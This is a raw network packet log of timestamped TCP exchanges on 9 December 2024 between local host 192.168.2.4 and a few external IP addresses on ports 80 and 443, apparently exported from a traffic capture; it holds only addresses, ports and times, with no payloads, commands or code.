Dec 9, 2024 08:08:47.093317032 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.099050999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.099096060 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.099412918 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.105923891 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.108860016 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.110572100 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.110589027 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.115181923 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.115216017 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.121558905 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.121576071 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.124541044 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.127785921 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.127844095 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.134076118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.134090900 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.134103060 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.140114069 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.140342951 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.140393019 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.146466970 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.146477938 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.152694941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.152805090 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.158699989 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.158719063 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.158730984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.162267923 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.164712906 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.164729118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.168927908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.168940067 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.170808077 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.170819044 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.170828104 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.175905943 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.176722050 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.176733971 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.176803112 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.182610035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.182621956 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.188590050 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.188622952 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.189038992 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.194449902 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.194484949 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.194521904 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.200174093 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.200193882 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.206118107 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.206151962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.209304094 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.211782932 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.211795092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.217513084 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.217525005 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.223289967 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.223300934 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.224772930 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.228832006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.228849888 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.234477043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.234488964 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.234498024 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.240087032 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.242902994 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.242913961 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.242932081 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.248526096 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.248539925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.248548985 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.249062061 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.254060030 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.254072905 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.256966114 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.259568930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.259583950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.265036106 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.265053988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.265064955 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.270458937 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.270472050 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.275852919 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.275865078 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.277328968 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.281219959 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.281230927 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.286575079 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.286587000 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.286597013 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.291887999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.291898966 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.297174931 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.297187090 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.297552109 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.302403927 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.302421093 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.307693958 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.307713032 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.307723999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.312799931 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.312813044 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.317871094 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.317954063 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.317966938 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.323071003 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.323086023 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.323096037 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.328185081 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.328197956 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.333296061 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.333309889 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.338040113 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.338040113 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.338294029 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.338306904 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.343369007 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.343379974 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.343390942 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.348263979 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.348347902 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.353236914 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.353266954 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.358119965 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.358128071 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.360614061 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.360625982 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.365608931 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.365622044 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.365632057 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.370392084 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.370419979 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.375276089 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.375319004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.379992962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.380007982 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.380027056 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.384710073 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.384741068 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.389445066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.389458895 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.394165993 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.394179106 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.394190073 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.398395061 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.398886919 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.398900986 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.403578043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.403592110 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.408232927 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.408247948 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.412883997 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.412900925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.412913084 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.417547941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.417562008 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.417574883 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.418554068 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.422146082 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.422158957 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.426713943 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.426728010 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.431267977 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.431282043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.435833931 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.435847998 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.438760042 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.440299988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.440314054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.449340105 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.453705072 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.458194971 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.458901882 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.462560892 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.479845047 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.482238054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.486501932 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.486516953 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.490772963 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.490786076 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.495029926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.495043993 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.495053053 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.499299049 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.499319077 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.499392986 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.503526926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.503544092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.503555059 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.507811069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.507823944 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.511878014 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.511893988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.516026974 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.516041994 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.519474030 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.520215988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.520231009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.524296999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.524312973 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.524323940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.528456926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.528470993 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.532283068 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.532481909 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.532505035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.536508083 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.536528111 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.536540031 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.539532900 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.540568113 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.540580988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.544574022 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.544589043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.545252085 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.545288086 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.545406103 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.545548916 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.548564911 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.548578024 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.552571058 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.552584887 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.552594900 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.556525946 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.557518005 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.558564901 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.558588982 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.558614016 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.559778929 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.562474966 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.562489033 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.566286087 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.566401958 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.566421986 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.570331097 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.570344925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.574212074 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.574224949 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.574235916 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.577636957 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.578089952 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.580080986 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.582001925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.584526062 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.585808992 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.585824013 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.586201906 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.589634895 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.593436003 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.593449116 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.597259998 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.600106955 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.601006985 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.601022959 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.604852915 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.604868889 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.604881048 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.605721951 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.608093977 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.608478069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.608510971 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.608685970 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.609805107 CET	49878	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:47.609836102 CET	443	49878	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:47.610353947 CET	49878	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:47.611546993 CET	49878	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:47.611561060 CET	443	49878	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:47.612199068 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:47.612229109 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:47.612330914 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.612345934 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.613603115 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:47.613668919 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.615967989 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.615982056 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.619611025 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.619635105 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.619647980 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.620213032 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.623281002 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.623296976 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.624665022 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.626893997 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.626907110 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.630557060 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.630573034 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.634171009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.634186029 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.634197950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.636759043 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:47.636771917 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:47.637775898 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.637795925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.639501095 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.641381025 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.643235922 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.643249035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.646925926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.646939993 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.650409937 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.650424004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.650434017 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.654028893 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.654042959 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.654055119 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.657577991 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.657592058 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.660814047 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.661142111 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.661155939 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.664664984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.664680004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.664889097 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.667078018 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.668163061 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.668178082 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.668323040 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.671679974 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.671694040 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.671704054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.671884060 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.675162077 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.675175905 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.678599119 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.678612947 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.680763006 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.682089090 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.682104111 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.685533047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.685548067 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.689009905 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.689023972 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.689033985 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.689047098 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:47.694715977 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.695211887 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:47.739995956 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:47.740284920 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:47.861341953 CET	80	49827	185.215.113.206	192.168.2.4
